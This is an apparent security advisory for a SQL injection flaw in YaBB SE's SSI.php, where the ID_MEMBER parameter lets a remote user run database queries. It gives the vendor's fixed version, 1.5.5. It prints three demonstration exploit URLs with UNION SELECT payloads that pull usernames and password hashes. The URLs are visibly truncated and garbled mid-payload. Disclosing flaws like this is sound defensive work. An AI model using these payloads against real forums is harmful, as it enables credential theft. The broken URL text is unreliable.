Description: An input validation vulnerability was reported in YaBB SE in 'SSI.php'. A remote user can inject SQL commands.
It is reported that that the ID_MEMEBER parameter is not properly validated by the 'recentTopics' and 'welcome' functions. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database. Some demonstration exploit URLs are provided:
http://[target]/yabbse/ SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_ME
N+S ELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*
http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER =1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_ME
ull,null+FROM+yabbse_members+/*
http://[target]/yabbse/SSI.php?function=wel come&username=evilhaxor&ID_MEMBER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+ASCII(SUBSTRING(realName,1,1)+)+
Impact: A remote user can execute arbitrary SQL commands on the underlying database. This can be exploited to view hashed passwords, for example.
Solution: The vendor has released a fixed version (1.5.5), available at:
http://www.yabbse.org/download.php
|
